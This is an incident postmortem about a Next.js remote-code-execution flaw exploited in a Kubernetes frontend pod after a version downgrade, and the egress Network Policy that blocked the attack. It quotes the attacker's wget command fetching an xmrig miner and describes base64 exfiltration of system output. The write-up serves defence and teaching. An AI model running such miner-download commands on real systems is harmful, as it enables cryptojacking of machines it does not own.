Incident · #security #kubernetes #nextjs #cve #networkpolicy #incident

Next.js RCE in Production: How the Attack Unfolded and What Stopped It

A manually deployed image with a downgraded Next.js version was exploited via GHSA-9qr9-h5gf-34mp within hours of deployment; a pre-existing Network Policy denying internet egress prevented the attacker from downloading xmrig and completing the compromise.

Gideon Warui

Incident 1007418. On March 16, 2026, the frontend pod began executing system commands. The trigger was a downgraded Next.js package. The CVE had been published. The exploit was already automated.


Environment

| Component | Detail |
| --- | --- |
| Cluster | AKS (<cluster>), West Europe |
| Affected pod | <core-system>-frontend, namespaces <namespace>-dev and <namespace>-prod |
| Vulnerable image | <acr-registry>.azurecr.io/<core-system>-frontend:20260313-081305 |
| Next.js version | 15.2.4 (vulnerable), downgraded from 15.2.6 |
| CVE | GHSA-9qr9-h5gf-34mp |

How the vulnerability got in

The March 13 manual build pulled the latest <core-system>-frontend-dev branch. That branch had a dependency downgrade:

- "next": "15.2.6"
+ "next": "15.2.4"

The downgrade happened in a PR that passed code review. The reason was a rendering regression in 15.2.6 that hadn’t been triaged yet. 15.2.4 was the last known-good version. The build went out without a Trivy scan — the pipeline was bypassed for the manual deployment, and no scan was run manually.

GHSA-9qr9-h5gf-34mp is a Remote Code Execution vulnerability in the React server actions flight protocol. Next.js 15.2.4 is in the affected range. For the 15.2.x line the fix shipped in 15.2.6, the same version the branch had been downgraded from.
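
A check like the following could flag this kind of downgrade before a build. It is a minimal sketch, not part of the original pipeline: the function names are hypothetical, and the floor of 15.2.6 is assumed only because that is the version the remediation below installs. It reads the declared version from package.json and does not look at the lockfile.

```python
import json
import re

# Assumption: 15.2.6 is used as the floor because it is the version the
# remediation in this post pins to. A single floor is only meaningful
# within one release line (here 15.2.x).
MIN_SAFE_NEXT = (15, 2, 6)


def parse_version(spec: str) -> tuple[int, int, int]:
    """Extract MAJOR.MINOR.PATCH from a spec such as '15.2.4' or '^15.2.4'."""
    match = re.search(r"(\d+)\.(\d+)\.(\d+)", spec)
    if match is None:
        raise ValueError(f"cannot parse version from {spec!r}")
    major, minor, patch = match.groups()
    return (int(major), int(minor), int(patch))


def next_is_below_floor(package_json_text: str, floor=MIN_SAFE_NEXT) -> bool:
    """Return True when the declared 'next' dependency is older than the floor."""
    manifest = json.loads(package_json_text)
    spec = manifest.get("dependencies", {}).get("next")
    if spec is None:
        return False  # no Next.js dependency declared
    return parse_version(spec) < floor


print(next_is_below_floor('{"dependencies": {"next": "15.2.4"}}'))
```

A real gate would more likely rely on a scanner's advisory database than on a hard-coded floor. The point here is only that the downgrade was mechanically detectable.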


What the attacker did

The first alert came from process monitoring. The frontend pod was running:

/usr/bin/wget -q https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-x64.tar.gz

Standard xmrig delivery. The wget command is what automated scanners fire when they find an RCE — download a miner, make it executable, run it. The image was node:18-debian at the time, which includes wget as part of the Debian base.

Alongside the wget attempt, forensic examination of the pod showed zombie processes:

[sh] <defunct>
[base64] <defunct>

The base64 zombie indicated the attacker was already exfiltrating system information — encoding the output of system commands and sending it out as a digest field in HTTP requests. Decoding one such payload:

top - 04:14:07 up 16:35, 0 user, load average: 0.03, 0.10, 0.21
Tasks: 17 total, 1 running, 5 sleeping, 0 stopped, 11 zombie

System metrics only. No application data, no database credentials, no secrets. The pod’s filesystem access was read-only and its environment variables included secrets mounted via ExternalSecret — but the attacker never read them. The exfiltration was scoping the system before attempting the full compromise.
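
For anyone repeating the triage, decoding such a payload takes a few lines. This is a sketch assuming the digest value is standard base64 over UTF-8 text, possibly with its padding stripped. The helper name is hypothetical, and the sample is re-encoded from the decoded output quoted above rather than taken from captured traffic.

```python
import base64
import binascii


def decode_digest(value: str) -> str:
    """Decode a base64 string to text, tolerating stripped '=' padding."""
    padded = value + "=" * (-len(value) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except binascii.Error as exc:
        raise ValueError("value is not valid base64") from exc
    # Replace undecodable bytes instead of failing on binary output.
    return raw.decode("utf-8", errors="replace")


# Round trip using the first line of the decoded payload quoted above.
sample = "top - 04:14:07 up 16:35, 0 user, load average: 0.03, 0.10, 0.21"
encoded = base64.b64encode(sample.encode("utf-8")).decode("ascii")
print(decode_digest(encoded))
```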


Why the download failed

The frontend Network Policy allows two outbound paths:

egress:
  # DNS via CoreDNS
  - to:
      - namespaceSelector:
          matchLabels:
            kubernetes.io/metadata.name: kube-system
    ports:
      - protocol: UDP
        port: 53
  # Backend communication only
  - to:
      - podSelector:
          matchLabels:
            app: <core-system>-backend
    ports:
      - protocol: TCP
        port: 3000

No outbound HTTP or HTTPS. The wget to github.com had no egress path. The TCP connection attempt timed out. The xmrig binary was never downloaded.

This was not a lucky break. The Network Policy was intentional — it had been applied during the Kinsing incident in December specifically because internet egress from the frontend pod has no legitimate business purpose. The frontend calls the backend; the backend calls external APIs. The frontend itself should never initiate outbound internet connections.
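
The effect of the two rules can be modelled as a default-deny allow-list. The sketch below is a deliberate simplification, not how Kubernetes evaluates policies: the destination strings are illustrative labels standing in for the namespace and pod selectors, and it assumes the policy declares Egress in its policyTypes, which the excerpt above does not show.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class EgressRule:
    destination: str  # simplified label for the selected peer, not a real selector
    protocol: str
    port: int


# Mirrors the two rules in the policy excerpt above.
FRONTEND_EGRESS = (
    EgressRule("kube-system", "UDP", 53),
    EgressRule("backend", "TCP", 3000),
)


def egress_allowed(destination: str, protocol: str, port: int,
                   rules=FRONTEND_EGRESS) -> bool:
    """Default deny: traffic passes only if some rule matches all three fields."""
    return any(
        rule.destination == destination
        and rule.protocol == protocol
        and rule.port == port
        for rule in rules
    )


for attempt in [("kube-system", "UDP", 53), ("backend", "TCP", 3000), ("github.com", "TCP", 443)]:
    print(attempt, "allowed" if egress_allowed(*attempt) else "denied")
```

Under this model DNS lookups still succeed while the HTTPS connection has no matching rule, which is consistent with the wget attempt timing out rather than failing on name resolution.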


Immediate response

# Scale to zero to stop any further execution
kubectl scale deployment <core-system>-frontend -n <namespace>-dev --replicas=0
kubectl scale deployment <core-system>-frontend -n <namespace>-prod --replicas=0

# Delete compromised pods (force-terminate)
kubectl delete pod -l app=<core-system>-frontend -n <namespace>-dev --force
kubectl delete pod -l app=<core-system>-frontend -n <namespace>-prod --force

The nodes were left running. The compromise was contained to the pod. The readOnlyRootFilesystem: true setting had prevented any writes to the container’s root filesystem, and the attack didn’t escape the container boundary.


Remediation

Step 1: Patch Next.js

sed -i 's/"next": "15.2.4"/"next": "15.2.6"/' package.json
npm install

Step 2: Rebuild with the hardened image

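The Dockerfile.secure had already been created after the December incident. It uses node:20-alpine, which has no curl and no Debian toolchain. Alpine’s BusyBox does still provide a minimal wget applet, so the image reduces the tooling available to an attacker rather than eliminating it: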

FROM node:20-alpine AS builder
WORKDIR /app
COPY package*.json ./
RUN npm ci
COPY . .
ARG NEXT_PUBLIC_API_URL=/api
ENV NEXT_PUBLIC_API_URL=${NEXT_PUBLIC_API_URL}
RUN npm run build

FROM node:20-alpine AS runner
WORKDIR /app
RUN addgroup -g 1001 nodejs && adduser -S -u 1001 nextjs
COPY --from=builder --chown=nextjs:nodejs /app/.next/standalone ./
COPY --from=builder --chown=nextjs:nodejs /app/public ./public
USER nextjs
EXPOSE 3000
CMD ["node", "server.js"]

docker build \
  --build-arg NEXT_PUBLIC_API_URL=/api \
  --no-cache \
  -f Dockerfile.secure \
  -t <acr-registry>.azurecr.io/<core-system>-frontend:20260316-071706 \
  .

docker push <acr-registry>.azurecr.io/<core-system>-frontend:20260316-071706

Step 3: Redeploy

kubectl set image deployment/<core-system>-frontend \
  <core-system>-frontend=<acr-registry>.azurecr.io/<core-system>-frontend:20260316-071706 \
  -n <namespace>-dev

kubectl set image deployment/<core-system>-frontend \
  <core-system>-frontend=<acr-registry>.azurecr.io/<core-system>-frontend:20260316-071706 \
  -n <namespace>-prod

kubectl rollout status deployment/<core-system>-frontend -n <namespace>-prod
# deployment "<core-system>-frontend" successfully rolled out

Post-deployment: 0 restarts across 48 hours. No further alerts.


What the scan found on the vulnerable image

Running Trivy against the image that was in production during the attack:

| Package | CVE | Severity |
| --- | --- | --- |
| next@15.2.4 | GHSA-9qr9-h5gf-34mp | CRITICAL (RCE) |
| form-data | CVE-2025-7783 | CRITICAL (unsafe random) |
| axios | CVE-2025-58754 | HIGH (DoS) |
| cross-spawn | CVE-2024-21538 | HIGH (ReDoS) |
| glob | CVE-2025-64756 | HIGH (command injection) |

Two CRITICAL vulnerabilities in the image that shipped. Neither was caught because no scan was run.
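
A scan only helps if its result can stop a push. The sketch below shows one way a manual-path script might gate on a Trivy JSON report. The field names (Results, Vulnerabilities, PkgName, VulnerabilityID, Severity) follow Trivy's JSON output as I understand it and should be checked against the installed version. The function name and the sample report are hypothetical, with the sample hand-written from rows of the table above.

```python
import json


def blocking_findings(report_text: str, blocking=("CRITICAL",)) -> list[tuple[str, str, str]]:
    """Return (package, advisory id, severity) for each finding at a blocking severity."""
    report = json.loads(report_text)
    findings = []
    for result in report.get("Results") or []:
        # Targets without findings may omit the key or set it to null.
        for vuln in result.get("Vulnerabilities") or []:
            if vuln.get("Severity") in blocking:
                findings.append(
                    (vuln.get("PkgName", "?"), vuln.get("VulnerabilityID", "?"), vuln["Severity"])
                )
    return findings


# Hand-written sample shaped like a Trivy report, not real scanner output.
sample_report = json.dumps({
    "Results": [{
        "Target": "package-lock.json",
        "Vulnerabilities": [
            {"PkgName": "next", "VulnerabilityID": "GHSA-9qr9-h5gf-34mp", "Severity": "CRITICAL"},
            {"PkgName": "form-data", "VulnerabilityID": "CVE-2025-7783", "Severity": "CRITICAL"},
            {"PkgName": "axios", "VulnerabilityID": "CVE-2025-58754", "Severity": "HIGH"},
        ],
    }]
})

for pkg, vuln_id, severity in blocking_findings(sample_report):
    print(f"{severity}: {pkg} ({vuln_id})")
```

Trivy can also fail the command itself through its --exit-code and --severity options, which may be simpler than parsing the report when no custom reporting is needed.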


What changed after this

Every manual deployment now requires:

  1. A named approver (was: none required)
  2. npm audit --audit-level=critical before building
  3. Trivy scan of the built image before push
  4. Both checks logged in the deployment record

The pipeline already ran Trivy. The gap was the manual path — which is exactly what gets used when things are urgent and steps get skipped.
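
The four requirements lend themselves to a mechanical check on the deployment record. The following is only a sketch: the record layout and field names (approver, npm_audit_passed, trivy_scan_passed) are hypothetical, since the post does not describe how the record is stored.

```python
def missing_requirements(record: dict) -> list[str]:
    """List the manual-deployment requirements a record fails to satisfy."""
    problems = []
    # A blank or whitespace-only approver does not count as a named approver.
    if not str(record.get("approver") or "").strip():
        problems.append("named approver")
    # Checks must be logged as an explicit True; a missing entry counts as not run.
    if record.get("npm_audit_passed") is not True:
        problems.append("npm audit --audit-level=critical")
    if record.get("trivy_scan_passed") is not True:
        problems.append("Trivy scan of the built image")
    return problems


# Hypothetical record in which the image scan was skipped.
record = {"approver": "a.reviewer", "npm_audit_passed": True}
print(missing_requirements(record))
```

Treating a missing entry the same as a failed check matters here, because the original gap was a scan that was never run rather than one that failed.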

The latest tag was also retired. Every image now carries an environment suffix (-uat, -prod) so it’s unambiguous what is running where:

<acr-registry>.azurecr.io/<core-system>-frontend:20260316-071706      # clean build
<acr-registry>.azurecr.io/<core-system>-backend:20260317-143958-prod  # env-tagged
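
A tag convention is easier to keep when a script can reject anything that does not fit it. This sketch assumes tags are a YYYYMMDD-HHMMSS timestamp with an optional -uat or -prod suffix, inferred from the two examples above. The function name and the require_env switch are hypothetical.

```python
import re
from datetime import datetime

# Assumption: timestamp plus an optional environment suffix, as in the examples above.
TAG_PATTERN = re.compile(r"(\d{8}-\d{6})(?:-(uat|prod))?")


def parse_tag(tag: str, require_env: bool = False):
    """Return (build_time, env) for a valid tag, or None if it does not fit the scheme."""
    match = TAG_PATTERN.fullmatch(tag)
    if match is None:
        return None  # covers 'latest' and any other free-form tag
    stamp, env = match.groups()
    try:
        built = datetime.strptime(stamp, "%Y%m%d-%H%M%S")
    except ValueError:
        return None  # digits present but not a real date or time
    if require_env and env is None:
        return None
    return built, env


for tag in ["latest", "20260316-071706", "20260317-143958-prod"]:
    print(tag, "->", parse_tag(tag))
```

Setting require_env=True would enforce the suffix on every image, at the cost of rejecting the untagged frontend build shown above.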

The chain that led here

  1. Dependency downgrade in a PR — motivated by a real regression, not negligence
  2. Manual deployment that bypassed the pipeline — justified by urgency
  3. No scan on the manual path — process gap, not tool gap
  4. CVE already exploited in the wild — attackers scan for newly-deployed vulnerable versions

Any one of these is manageable. All four together, in sequence, is an incident.
